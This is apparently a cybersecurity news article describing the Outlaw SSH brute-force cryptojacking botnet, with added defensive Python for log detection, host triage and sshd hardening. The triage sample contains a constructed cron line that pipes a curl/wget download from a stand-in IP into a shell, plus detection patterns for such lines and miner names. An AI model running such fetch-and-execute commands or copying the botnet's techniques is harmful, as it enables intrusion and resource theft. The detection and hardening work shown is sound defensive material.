Outlaw Botnet: Targets Weak SSH Servers for Cryptocurrency Mining

CYBER SYRUP
Delivering the sweetest insights on cybersecurity.


Cybersecurity researchers have released new findings on Outlaw, also known as Dota, a self-propagating botnet that targets Linux systems with exposed SSH servers. Outlaw leverages brute-force attacks, cryptocurrency mining, and worm-like propagation, allowing it to persist and scale its reach across compromised environments.

The research, published by Elastic Security Labs, offers a deeper look into the botnet’s tactics, techniques, and procedures (TTPs), painting a picture of a long-running and evolving threat in the cryptojacking ecosystem.

Who Is Behind Outlaw?

Outlaw is not only the name of the malware but also the threat actor group responsible for its development and deployment. Believed to be of Romanian origin, Outlaw has been active since at least 2018 and is part of a broader ecosystem of cybercriminals focused on cryptocurrency mining through illicit access.

Other major groups in this space include:

  • 8220 Gang

  • Keksec (aka Kek Security)

  • Kinsing

  • TeamTNT

These groups have repeatedly demonstrated the monetary incentives and low entry barriers associated with cryptojacking operations, particularly in Linux-based environments.

Infection Chain: How Outlaw Works

The Outlaw botnet targets poorly secured SSH servers, focusing on those with weak or default credentials. Once access is gained, the attackers add their own SSH public key to the account's authorized_keys file, giving them persistent key-based access that survives a later password change; only removing the key from authorized_keys revokes it.

Multi-Stage Infection Flow

  1. Initial Access via SSH Brute Force

    • Exploits weak SSH credentials to gain unauthorized access

  2. Deployment of Dropper Script

    • A shell script called tddwrt7s.sh is downloaded and executed

    • This script retrieves and unpacks an archive file (dota3.tar.gz)

  3. Installation and Cleanup

    • The malware launches the cryptocurrency miner

    • Simultaneously, it removes traces of previous infections and eliminates other active miners, including its own outdated versions
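
Detection logic for the first two steps of this chain, added here as an example that is not part of the original article or Elastic's tooling: it flags an sshd "Accepted" line that follows a burst of failures from the same source address, and diffs the keys in authorized_keys against a baseline of approved SHA256 fingerprints (the same form ssh-keygen -l prints). The log lines, the key material (synthetic blobs in the correct OpenSSH wire format, not real keys), the comments and the approved set are all constructed for the example; the IP addresses come from documentation ranges.

```python
"""Detect the SSH brute-force-then-success pattern in sshd log lines and audit
authorized_keys against a baseline. Added example; all inputs are constructed."""
import base64
import hashlib
import re
import struct
from collections import defaultdict

FAILED_RE = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")
ACCEPTED_RE = re.compile(r"Accepted (password|publickey) for (\S+) from (\S+) port \d+")


def find_bruteforce_logins(lines, threshold=5):
    """Scan sshd log lines in order; report each accepted login whose source IP
    accumulated at least `threshold` failures since its last successful login."""
    failures = defaultdict(int)
    hits = []
    for line in lines:
        failed = FAILED_RE.search(line)
        if failed:
            failures[failed.group(2)] += 1
            continue
        accepted = ACCEPTED_RE.search(line)
        if accepted:
            method, user, ip = accepted.groups()
            if failures[ip] >= threshold:
                hits.append({"ip": ip, "user": user, "method": method, "failures": failures[ip]})
            failures[ip] = 0
    return hits


def _split_key(pubkey_line):
    """Return (key_type, base64_blob, comment) for one authorized_keys line.
    Leading options such as no-pty or from=... are skipped if they contain no spaces."""
    fields = pubkey_line.split()
    for i, field in enumerate(fields):
        if field.startswith(("ssh-", "ecdsa-", "sk-")):
            return field, fields[i + 1], " ".join(fields[i + 2:])
    raise ValueError("not an OpenSSH public key line")


def key_fingerprint(pubkey_line):
    """SHA256 fingerprint in `ssh-keygen -l` form: base64 of the digest, padding stripped."""
    _, b64, _ = _split_key(pubkey_line)
    digest = hashlib.sha256(base64.b64decode(b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def audit_authorized_keys(text, approved_fingerprints):
    """Return (fingerprint, comment) for every key whose fingerprint is not approved."""
    unknown = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fp = key_fingerprint(line)
        if fp not in approved_fingerprints:
            unknown.append((fp, _split_key(line)[2]))
    return unknown


def constructed_ed25519_line(seed, comment):
    """Build a syntactically valid ssh-ed25519 line from a constructed 32-byte value.
    Not a real key: only the wire format (length-prefixed type and key bytes) matters here."""
    key_bytes = hashlib.sha256(seed).digest()
    blob = struct.pack(">I", 11) + b"ssh-ed25519" + struct.pack(">I", 32) + key_bytes
    return f"ssh-ed25519 {base64.b64encode(blob).decode()} {comment}"


# Constructed sample data (documentation IP ranges, synthetic keys).
SAMPLE_AUTH_LOG = """\
Apr  1 03:12:01 host sshd[2041]: Failed password for root from 203.0.113.45 port 51012 ssh2
Apr  1 03:12:03 host sshd[2041]: Failed password for root from 203.0.113.45 port 51012 ssh2
Apr  1 03:12:05 host sshd[2043]: Failed password for invalid user admin from 203.0.113.45 port 51030 ssh2
Apr  1 03:12:07 host sshd[2045]: Failed password for root from 203.0.113.45 port 51044 ssh2
Apr  1 03:12:09 host sshd[2047]: Failed password for root from 203.0.113.45 port 51058 ssh2
Apr  1 03:12:11 host sshd[2049]: Accepted password for root from 203.0.113.45 port 51072 ssh2
Apr  1 03:15:22 host sshd[2100]: Accepted publickey for alice from 192.0.2.10 port 40100 ssh2
"""
ADMIN_KEY = constructed_ed25519_line(b"alice", "alice@workstation")
INTRUDER_KEY = constructed_ed25519_line(b"intruder", "root@unknown")
APPROVED_FINGERPRINTS = {key_fingerprint(ADMIN_KEY)}
SAMPLE_AUTHORIZED_KEYS = f"{ADMIN_KEY}\n{INTRUDER_KEY}\n"

if __name__ == "__main__":
    for hit in find_bruteforce_logins(SAMPLE_AUTH_LOG.splitlines()):
        print("brute-force login:", hit)
    for fp, comment in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, APPROVED_FINGERPRINTS):
        print("unapproved key:", fp, comment)
```

The baseline set is the important part: the fingerprint comparison catches an added key even when the attacker reuses a plausible comment string, and the same audit can be run over every account's authorized_keys, including service accounts that nobody logs into interactively.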

Worm-Like Propagation and Brute Forcing

A standout feature of the malware is its self-propagation mechanism, driven by an initial access module known as BLITZ. This component:

  • Scans the internet for systems running SSH services

  • Connects to a C2 (Command and Control) server over SSH

  • Fetches a list of new targets to perpetuate the infection cycle

This botnet-style approach enables the malware to scale rapidly, particularly in environments with many vulnerable servers.

Exploiting Known Vulnerabilities and Telnet

Beyond brute-forcing SSH, Outlaw also targets older Linux and Unix-based systems that are still vulnerable to:

  • CVE-2016-8655 (a race condition in the kernel's AF_PACKET socket code)

  • CVE-2016-5195 (Dirty COW)

Both are local privilege-escalation bugs in the Linux kernel, so they serve to turn a brute-forced low-privilege account into root rather than as remote entry points. The malware may also use Telnet brute-forcing to expand its reach further, especially in embedded systems or IoT environments.

Command and Control with SHELLBOT

Upon establishing access, Outlaw deploys a component called SHELLBOT, a Perl-based bot that connects to a C2 server via IRC (Internet Relay Chat). SHELLBOT enables a wide range of malicious activities, including:

  • Execution of arbitrary shell commands

  • Downloading and running additional payloads

  • Launching DDoS (Distributed Denial-of-Service) attacks

  • Credential theft

  • Data exfiltration

IRC remains a popular choice among Linux botnet operators because it is trivial to implement in a script and, in environments without egress filtering or protocol inspection, a server's outbound IRC connection often goes unnoticed.

Mining Operations and Persistence

The malware's payload is an XMRig-based Monero miner, and the surrounding scripts tune the compromised host for it.

Mining Optimization Techniques:

  • CPU Detection: Determines system capabilities for optimal mining performance

  • Hugepages Activation: Raises the kernel's hugepage reservation (scaled to the number of CPU cores) so the miner's memory-intensive hashing benefits from large-page memory access

  • Persistence via Cron: Uses cron jobs to relaunch malware at reboot or predefined intervals

  • Custom Communication Binary: A tool named kswap01 maintains communication with the threat actor's infrastructure
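
A host-triage pass for the traits in the list above, added here as an example and not Elastic's detection logic: it inspects a crontab for jobs launched from hidden or world-writable paths or download-and-pipe-to-shell one-liners, flags user processes whose name imitates a kernel thread (kswap01 sits next to the kernel's real kswapd0, and a genuine kernel thread shows its name in brackets with no on-disk executable), known miner names, CPU hogs, and a hugepage reservation above the host's baseline. The crontab, ps output and sysctl value are constructed; the kernel-thread list, the similarity ratio and the 80% CPU threshold are assumptions to tune per host.

```python
"""Host triage for the persistence and mining traits listed above. Added
example with constructed inputs; thresholds and the kernel-thread list are
assumptions to tune per host, not figures from the report."""
import difflib
import re

WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
HIDDEN_DIR = re.compile(r"/\.[^./]")                 # a path component that starts with a dot
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
MINER_NAMES = {"xmrig", "kswap01"}                    # kswap01: the comms binary named in the report
KERNEL_THREADS = ("kswapd0", "kthreadd", "ksoftirqd", "kworker", "migration")
LOOKALIKE_RATIO = 0.8                                 # assumed similarity cut-off
CPU_ALERT_PERCENT = 80.0                              # assumed threshold


def _suspicious_path(token):
    return token.startswith(WRITABLE_DIRS) or bool(HIDDEN_DIR.search(token))


def check_crontab(text):
    """Flag user-crontab entries (five schedule fields or @reboot-style) that run
    from hidden/world-writable paths or pipe a download into a shell.
    /etc/cron.d files carry an extra user field and would need a 7-way split."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1) if line.startswith("@") else line.split(None, 5)
        if len(parts) < (2 if line.startswith("@") else 6):
            continue
        command = parts[-1]
        reasons = []
        if any(_suspicious_path(tok) for tok in command.split()):
            reasons.append("runs from a hidden or world-writable path")
        if PIPE_TO_SHELL.search(command):
            reasons.append("pipes a download straight into a shell")
        if reasons:
            findings.append({"source": "cron", "item": line, "reasons": reasons})
    return findings


def check_processes(ps_text):
    """Input is `ps -eo pid,user,pcpu,comm,args` output. Real kernel threads show
    their name in brackets and have no executable, so they are skipped; everything
    else is scored for kernel-name mimicry, known miner names, CPU use and path."""
    findings = []
    for line in ps_text.splitlines()[1:]:            # skip the header row
        fields = line.split(None, 4)
        if len(fields) < 5:
            continue
        pid, user, pcpu, comm, args = fields
        if args.startswith("["):
            continue
        reasons = []
        closest = max(KERNEL_THREADS, key=lambda name: difflib.SequenceMatcher(None, comm, name).ratio())
        if difflib.SequenceMatcher(None, comm, closest).ratio() >= LOOKALIKE_RATIO:
            reasons.append(f"name imitates kernel thread {closest}")
        if comm in MINER_NAMES:
            reasons.append("known miner/botnet component name")
        if float(pcpu) >= CPU_ALERT_PERCENT:
            reasons.append(f"{pcpu}% CPU")
        if _suspicious_path(args.split()[0]):
            reasons.append("executable lives in a hidden or world-writable path")
        if reasons:
            findings.append({"source": "process", "item": f"{pid} {user} {comm}", "reasons": reasons})
    return findings


def check_hugepages(nr_hugepages, baseline=0):
    """vm.nr_hugepages above what the host's own workload needs (0 on a box with
    no database or JVM tuning) is one of the miner's fingerprints."""
    if nr_hugepages > baseline:
        return [{"source": "sysctl", "item": f"vm.nr_hugepages = {nr_hugepages}",
                 "reasons": [f"hugepages reserved above baseline {baseline}"]}]
    return []


def triage(crontab_text, ps_text, nr_hugepages, hugepage_baseline=0):
    return (check_crontab(crontab_text) + check_processes(ps_text)
            + check_hugepages(nr_hugepages, hugepage_baseline))


# Constructed samples: a user crontab, ps output, and a sysctl reading.
SAMPLE_CRONTAB = """\
# constructed sample user crontab
0 2 * * * /usr/bin/certbot renew --quiet
@reboot /var/tmp/.cache/upd >/dev/null 2>&1
*/10 * * * * (curl -fsSL http://198.51.100.7/x.sh || wget -qO- http://198.51.100.7/x.sh) | sh
"""
SAMPLE_PS = """\
  PID USER     %CPU COMM     ARGS
    2 root      0.0 kthreadd [kthreadd]
   71 root      0.0 kswapd0  [kswapd0]
  890 postgres  3.1 postgres /usr/lib/postgresql/14/bin/postgres -D /var/lib/postgresql/14/main
 1422 www-data 97.5 kswap01  /var/tmp/.cache/kswap01
 1430 www-data 99.0 xmrig    /var/tmp/.cache/xmrig -o 198.51.100.7:3333
"""
SAMPLE_NR_HUGEPAGES = 1280

if __name__ == "__main__":
    for f in triage(SAMPLE_CRONTAB, SAMPLE_PS, SAMPLE_NR_HUGEPAGES):
        print(f"[{f['source']}] {f['item']}: {'; '.join(f['reasons'])}")
```

The bracket test is the cheap way to separate a real kernel thread from a process wearing its name: kswapd0 appears as `[kswapd0]` with no path, while a binary dropped under /var/tmp/.cache shows a full executable path and, here, a CPU figure that no swap daemon should ever reach.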

Defense Evasion and Public Tools

Despite relying on what may appear to be basic attack methods, Outlaw integrates several techniques for defense evasion:

  • Modified XMRig miners to evade miner-detection signatures

  • SSH key manipulation for stealthy persistence

  • Publicly available scripts to clean logs and prevent detection

“Outlaw remains active despite using basic techniques like SSH brute-forcing, SSH key manipulation, and cron-based persistence,” said Elastic Security Labs. “It shows how even simple tools, when orchestrated correctly, can form a resilient and dangerous malware campaign.”

Recommendations for Mitigation

Organizations and administrators should take proactive steps to defend against threats like Outlaw:

  • Do not expose SSH to the internet unless absolutely necessary; where remote access is required, restrict source addresses or put it behind a VPN or bastion host

  • Prefer key-based authentication over passwords, use strong, unique credentials wherever passwords remain, and add multi-factor authentication

  • Regularly rotate SSH keys and audit the authorized_keys file of every account, including service accounts, against a known baseline

  • Patch Linux systems to address known vulnerabilities like Dirty COW, which the botnet uses to escalate privileges after a successful login

  • Monitor for unusual processes, sustained high CPU usage, new cron entries, and servers initiating outbound IRC or SSH connections
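
The SSH-hygiene points above turned into a check, added as an example that is not from the original article: it audits the global section of an sshd_config against four directives, reports the effective value (taking OpenSSH's documented default when a directive is absent, and honouring sshd's rule that the first occurrence of a directive wins), and emits a hardened copy with the weak settings corrected and the missing ones added before any Match block. The sample config is constructed and the group name ssh-users is an assumption; Match blocks are left untouched, so per-user overrides still need a manual look.

```python
"""Audit the global section of an sshd_config and produce a hardened copy.
Added example; the sample config below is constructed. Like sshd itself, the
first occurrence of a directive wins, and parsing stops at the first Match
block because per-Match overrides are not modelled here."""
import re

# directive -> (OpenSSH default when absent, acceptance test, value to set)
POLICY = {
    "permitrootlogin": ("prohibit-password", lambda v: v in ("no", "prohibit-password"), "no"),
    "passwordauthentication": ("yes", lambda v: v == "no", "no"),
    "maxauthtries": ("6", lambda v: v.isdigit() and int(v) <= 3, "3"),
    # presence is what matters here; "ssh-users" is an assumed group name for the example
    "allowgroups": (None, lambda v: v is not None, "ssh-users"),
}
CANONICAL = {
    "permitrootlogin": "PermitRootLogin",
    "passwordauthentication": "PasswordAuthentication",
    "maxauthtries": "MaxAuthTries",
    "allowgroups": "AllowGroups",
}


def _parse_line(raw):
    """Return (key, value) in lower case for a directive line, or (None, None)
    for blank and comment lines. sshd accepts both 'Key value' and 'Key=value'."""
    stripped = raw.split("#", 1)[0].strip()
    if not stripped:
        return None, None
    parts = re.split(r"[\s=]+", stripped, maxsplit=1)
    return parts[0].lower(), (parts[1].strip().lower() if len(parts) > 1 else "")


def effective_directives(text):
    """Global directives with first-occurrence-wins semantics, stopping at Match."""
    eff = {}
    for raw in text.splitlines():
        key, value = _parse_line(raw)
        if key == "match":
            break
        if key is not None:
            eff.setdefault(key, value)
    return eff


def audit_sshd_config(text):
    """Return (directive, effective_value, recommended_value) for each failing check."""
    eff = effective_directives(text)
    findings = []
    for key, (default, ok, recommended) in POLICY.items():
        current = eff.get(key, default)
        if not ok(current):
            findings.append((CANONICAL[key], current, recommended))
    return findings


def harden_sshd_config(text):
    """Rewrite the first occurrence of each failing directive in the global section,
    append the missing ones before any Match block, and leave everything else as is."""
    to_fix = {directive.lower(): rec for directive, _, rec in audit_sshd_config(text)}
    lines = text.splitlines()
    split_at = next((i for i, raw in enumerate(lines) if _parse_line(raw)[0] == "match"), len(lines))
    out = []
    for raw in lines[:split_at]:
        key, _ = _parse_line(raw)
        if key in to_fix:
            out.append(f"{CANONICAL[key]} {to_fix.pop(key)}")
        else:
            out.append(raw)
    out.extend(f"{CANONICAL[key]} {rec}" for key, rec in to_fix.items())
    return "\n".join(out + lines[split_at:]) + "\n"


# Constructed sample: the weak settings the botnet relies on, plus a Match block.
WEAK_CONFIG = """\
# constructed sample sshd_config, not taken from any real host
Port 22
PermitRootLogin yes
PasswordAuthentication yes
#MaxAuthTries 6
UsePAM yes
X11Forwarding yes
Match User backup
    PasswordAuthentication yes
"""

if __name__ == "__main__":
    for directive, current, recommended in audit_sshd_config(WEAK_CONFIG):
        print(f"{directive}: effective '{current}', set to '{recommended}'")
    print(harden_sshd_config(WEAK_CONFIG))
```

Two details matter in practice: a commented-out `#MaxAuthTries 6` still leaves the default of 6 in force, which is why the audit evaluates the effective value rather than the presence of a line, and the `Match User backup` block in the sample keeps password login for that one account after hardening, which is exactly the kind of exception the brute-forcer is looking for.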

Final Thoughts

The Outlaw botnet exemplifies how long-running, low-complexity threats can still pose serious risks when targeting misconfigured or unprotected systems. By combining brute-force access, mining, and self-propagation, the malware ensures that even basic security oversights can lead to persistent compromises and resource theft.

Maintaining SSH hygiene, monitoring system behavior, and staying up to date with Linux security patches are key defenses in today’s evolving threat landscape.